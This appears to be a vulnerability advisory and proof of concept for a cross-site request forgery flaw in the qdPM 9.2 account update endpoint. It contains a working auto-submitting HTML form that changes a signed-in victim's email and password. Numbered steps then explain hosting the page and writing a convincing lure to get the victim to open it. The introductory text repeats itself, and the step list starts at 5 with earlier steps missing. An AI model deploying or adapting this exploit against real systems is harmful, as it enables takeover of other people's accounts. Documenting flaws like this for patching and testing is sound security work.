Through the “index.php/myAccount/update” URI, the qdPM 9.2 application is susceptible to Cross-Site Request Forgery (CSRF) attacks. The security and integrity of the application might possibly be jeopardized by this vulnerability, which enables an attacker to carry out unauthorized operations on behalf of an authenticated user.
Cross-Site Request Forgery (CSRF) attacks are possible through the “index.php/myAccount/update” URI on the qdPM 9.2 application. Because of this flaw, an attacker might change the account settings of a user who has provided authentication and take unapproved activities on their behalf.
All adjustments to user accounts, including changing passwords, email addresses, and personal information, must go through the “index.php/myAccount/update” gateway. The application on this endpoint, however, is not properly protected against CSRF, leaving it open to exploitation.
A malicious web page or HTML email must have a form that sends a request to the “index.php/myAccount/update” URI in order to exploit this issue. The form will have the required fields so that the targeted user’s account information may be changed.
An authorized user must be persuaded to visit the malicious website or click on the forged link while signed into their qdPM account in order for the CSRF attack to be effective. The malicious request is automatically made once the user interacts with the form, which results in unauthorized changes to their account.
<html>
<body>
<h1>CSRF PoC - qdPM 9.2</h1>
<form action="https://target.qdpm.com/index.php/myAccount/update" method="POST" id="csrfForm">
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="newpassword123" />
<!-- Additional fields can be added here to modify other account settings -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
5. Replace “https://target.qdpm.com" with the actual URL of the qdPM application you are testing.
6. Customize the hidden input fields to specify the desired changes to the user’s account details (e.g., email, password).
Save the “csrf_poc.html” file.
7. Host the file on a web server or transfer it to a location accessible by the target user.
8. Craft a convincing message or webpage enticing the authenticated user to visit the URL hosting the “csrf_poc.html” file.
9. Once the user accesses the malicious page, the form will automatically submit the CSRF request to the “index.php/myAccount/update” URI, modifying the user’s account details without their knowledge.